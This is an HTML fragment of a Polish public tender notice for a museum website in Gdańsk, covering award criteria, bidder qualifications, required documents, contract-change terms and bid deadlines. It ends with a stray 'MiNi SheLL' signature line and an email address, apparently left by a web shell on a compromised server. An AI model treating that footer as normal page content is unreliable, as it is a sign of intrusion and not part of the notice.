<h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja – okres serwisowania strony www</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Szybkość reakcji na awarię i jej usunięcie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Poświadczenie zgodności strony serwisu www z wymogami wcag 2.1 poprzez dostarczenie audytu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba roboczogodzin na dokonanie dodatkowych zmian na stronie www w okresie gwarancji, od momentu odbioru portalu przez Zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie przedmiotowego zamówienia mogą się ubiegać wykonawcy, którzy spełniają<br/>warunki udziału w postępowaniu określone przez zamawiającego.<br/>2.	Zamawiający wymaga spełnienia warunku udziału w postępowaniu, w zakresie zdolności<br/>technicznej lub zawodowej, tj. <br/>1)	W okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie: Wykonawca zrealizował przynajmniej 3 portale internetowe o wartości zamówienia co najmniej 50.000 PLN netto każda, co obejmowało czynność kodowania. Zamawiający dopuszcza tu wykonanie usług polegających wyłącznie na kodowaniu portalu.<br/>2)	Wykonawca skieruje do realizacji zamówienia zespół składający się co najmniej z następujących osób:<br/>- jedna osoba posiadająca doświadczenie w pracy na stanowisku kierownika projektu lub koordynatora lub project managera lub opiekuna biznesowego dla co najmniej 2 projektów polegających na opracowaniu i realizacji portalu lub serwisu lub strony internetowej w okresie ostatnich trzech lat przed upływem terminu składania ofert;<br/>- jedna osoba, która posiada doświadczenie polegające na programowaniu stron internetowych i wykonała co najmniej 2 realizacje portalu lub serwisu lub strony internetowej w okresie ostatnich trzech lat przed upływem terminu składania ofert.<br/>3.	Oceniając zdolność techniczną lub zawodową, zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>4.	Odnośnie wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą oni polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>5.	W przypadku posługiwania się przez wykonawcę cudzym potencjałem (podmiot trzeci),<br/>wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 2a do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykaz usług wykonanych w okresie ostatnich 3 lat licząc wstecz od dnia, w którym upływa termin składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane- załącznik nr 3 do SWZ oraz załączenie dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami są:<br/>- referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane,<br/>- oświadczenie Wykonawcy, jeżeli Wykonawca z przyczyn niezależnych od niego, nie jest wstanie uzyskać tych dokumentów<br/>b) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – 4 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Załączenie do oferty w systemie następujących oświadczeń i dokumentów w formie plików:<br/>a) W przypadku, gdy oferta została podpisana przez inną osobę niż umocowana w dokumencie rejestrowym Wykonawcy,<br/>dokumentu (np. pełnomocnictwa) potwierdzającego, że oferta została złożona przez osobę upoważnioną do<br/>reprezentowania Wykonawcy.<br/>Dokument pełnomocnictwa może zostać załączony do oferty w:<br/>– oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym, podpisem<br/>osobistym lub popisem zaufanym osoby/osób upoważnionej/upoważnionych do reprezentowania Wykonawcy zgodnie z<br/>formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej, lub<br/>– cyfrowego odwzorowania dokumentu w postaci papierowej poświadczonego za zgodność z oryginałem przez notariusza,<br/>tj. podpisanej kwalifikowanym podpisem elektronicznym, podpisem osobistym lub popisem zaufanym osoby posiadającej<br/>uprawnienia notariusza.<br/>b) w przypadku, gdy oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa – dowody, o których mowa w SWZ.<br/>Powyższy dokument może zostać załączony do oferty w:<br/>– oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym, podpisem<br/>osobistym lub popisem zaufanym osoby/osób upoważnionej/upoważnionych do reprezentowania Wykonawcy zgodnie z<br/>formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie, lub<br/>– cyfrowego odwzorowania dokumentu w postaci papierowej poświadczonej za zgodność z oryginałem, tj. podpisanej<br/>kwalifikowanym podpisem elektronicznym, podpisem osobistym lub popisem zaufanym osoby/osób<br/>upoważnionej/upoważnionych do reprezentowania Wykonawcy zgodnie z formą reprezentacji, określoną w dokumencie<br/>rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie.<br/>c) W przypadku, gdy Wykonawca polega na zdolnościach lub sytuacji innych podmiotów – dokument potwierdzający, że<br/>realizując zamówienie, Wykonawca będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności<br/>zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.<br/>Powyższy dokument powinien zawierać informacje dotyczące w szczególności:<br/>• zakresu dostępnych Wykonawcy zasobów innego podmiotu,<br/>• sposobu wykorzystania zasobów innego podmiotu przez Wykonawcę przy wykonaniu zamówienia,<br/>• zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia,<br/>• czy podmiot, na którego zdolnościach Wykonawca polega w odniesieniu do warunków udziału w postępowaniu<br/>dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą (czy będzie brał udział w wykonaniu zamówienia).<br/>Powyższy dokument może zostać załączony do oferty w:<br/>– oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym, podpisem<br/>osobistym lub popisem zaufanym osoby/osób upoważnionej/upoważnionych do reprezentowania zgodnie z formą<br/>reprezentacji podmiotu na którego zdolnościach lub sytuacji polega Wykonawca, określoną w dokumencie rejestrowym<br/>właściwym dla formy organizacyjnej lub innym dokumencie, lub – cyfrowego odwzorowania dokumentu w postaci<br/>papierowej poświadczonej za zgodność z oryginałem, tj. podpisanej kwalifikowanym podpisem elektronicznym, podpisem<br/>osobistym lub popisem zaufanym osoby/osób upoważnionej/upoważnionych do reprezentowania zgodnie z formą<br/>reprezentacji podmiotu, na którego zdolnościach lub sytuacji polega Wykonawca, określoną w dokumencie rejestrowym<br/>właściwym dla formy organizacyjnej lub innym dokumencie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Stosownie do treści art. 436 pkt 4) lit. b) ustawy Pzp, Strony zobowiązują się dokonać zmiany wysokości wynagrodzenia należnego Wykonawcy w formie pisemnego aneksu, każdorazowo w przypadku wystąpienia jednej z następujących okoliczności: <br/>1) zmiany stawki podatku od towarów i usług, <br/>2) zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, <br/>3) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne, <br/>4) zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych na zasadach i w sposób określony w ust. 2 - 8 niniejszego paragrafu, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. <br/>2. Zmiana wysokości wynagrodzenia należnego Wykonawcy w przypadku zaistnienia przesłanki, o której mowa w ust. 1 pkt 1) niniejszego paragrafu, będzie odnosić się wyłącznie do części przedmiotu Umowy zrealizowanej, zgodnie z terminami ustalonymi Umową, po dniu wejścia w życie przepisów zmieniających stawkę podatku od towarów i usług oraz wyłącznie do części przedmiotu Umowy, do której zastosowanie znajdzie zmiana stawki podatku od towarów i usług. <br/>3. W przypadku zmiany, o której mowa w ust. 1 pkt 1) niniejszego paragrafu każda ze Stron jest uprawniona do złożenia drugiej Stronie pisemnego wniosku o zmianę umowy w zakresie płatności wynikających z faktur wystawionych po wejściu w życie przepisów zmieniających stawkę podatku od towarów i usług. Wniosek powinien zawierać wyczerpujące uzasadnienie faktyczne i wskazanie podstaw prawnych zmiany stawki podatku od towarów i usług oraz dokładne wyliczenie kwoty wynagrodzenia należnego Wykonawcy po zmianie umowy. W przypadku zmiany, o której mowa w ust. 1 pkt 1) niniejszego paragrafu, wartość wynagrodzenia netto nie zmieni się, a wartość wynagrodzenia brutto zostanie wyliczona na podstawie nowych przepisów. <br/>4. W przypadku zmiany, o której mowa w ust. 1 pkt 2) niniejszego paragrafu, Wykonawca jest uprawniony do złożenia Zamawiającemu pisemnego wniosku o zmianę umowy w zakresie płatności wynikających z faktur wystawionych po wejściu w życie przepisów zmieniających wysokość minimalnego wynagrodzenia za pracę. Wniosek powinien zawierać wyczerpujące uzasadnienie faktyczne i wskazanie podstaw prawnych oraz dokładne wyliczenie kwoty wynagrodzenia należnego Wykonawcy po zmianie umowy, w szczególności należy wykazać związek pomiędzy wnioskowaną kwotą zmiany wynagrodzenia, a wpływem zmiany minimalnego wynagrodzenia za pracę na kalkulację wynagrodzenia. Wniosek Wykonawcy może obejmować jedynie dodatkowe koszty realizacji umowy, które obowiązkowo ponosi on w związku z podwyższeniem wysokości płacy minimalnej. Zamawiający oświadcza, że nie <br/>będzie akceptował kosztów wynikających z podwyższenia wynagrodzeń pracownikom Wykonawcy, które nie są konieczne w celu ich dostosowania do wysokości minimalnego wynagrodzenia za pracę, w szczególności koszty podwyższenia wynagrodzenia w kwocie przewyższającej wysokość płacy minimalnej. <br/>5. W przypadku zmiany, o której mowa w ust. 1 pkt 3) niniejszego paragrafu, wynagrodzenie Wykonawcy ulegnie zmianie o kwotę odpowiadającą zmianie kosztu Wykonawcy ponoszonego w związku z wypłatą wynagrodzenia pracownikom świadczącym usługi. Kwota odpowiadająca zmianie kosztu Wykonawcy będzie odnosić się wyłącznie do części wynagrodzenia pracowników świadczących usługi, o których mowa w zdaniu poprzedzającym, odpowiadającej zakresowi, w jakim wykonują oni prace bezpośrednio <br/>związane z realizacją przedmiotu Umowy. <br/><br/>Z uwagi na ograniczenie tekstu do 4000 znaków Zamawiający skrócił zakres Zmian Umowy. Pełen zakres zawarty jest w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-26 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://muzeumnarodowe-gdansk.ezamawiajacy.pl/pn/muzeumnarodowe-gdansk/demand/193024/notice/public/details</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-26 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Plik FIGMA, który stanowi załącznik zawierający projekt portalu www jest możliwy do otworzenia i obejrzenia za pomocą darmowej aplikacji dostępnej pod adresem: figma.com

Creat By MiNi SheLL
Email: jattceo@gmail.com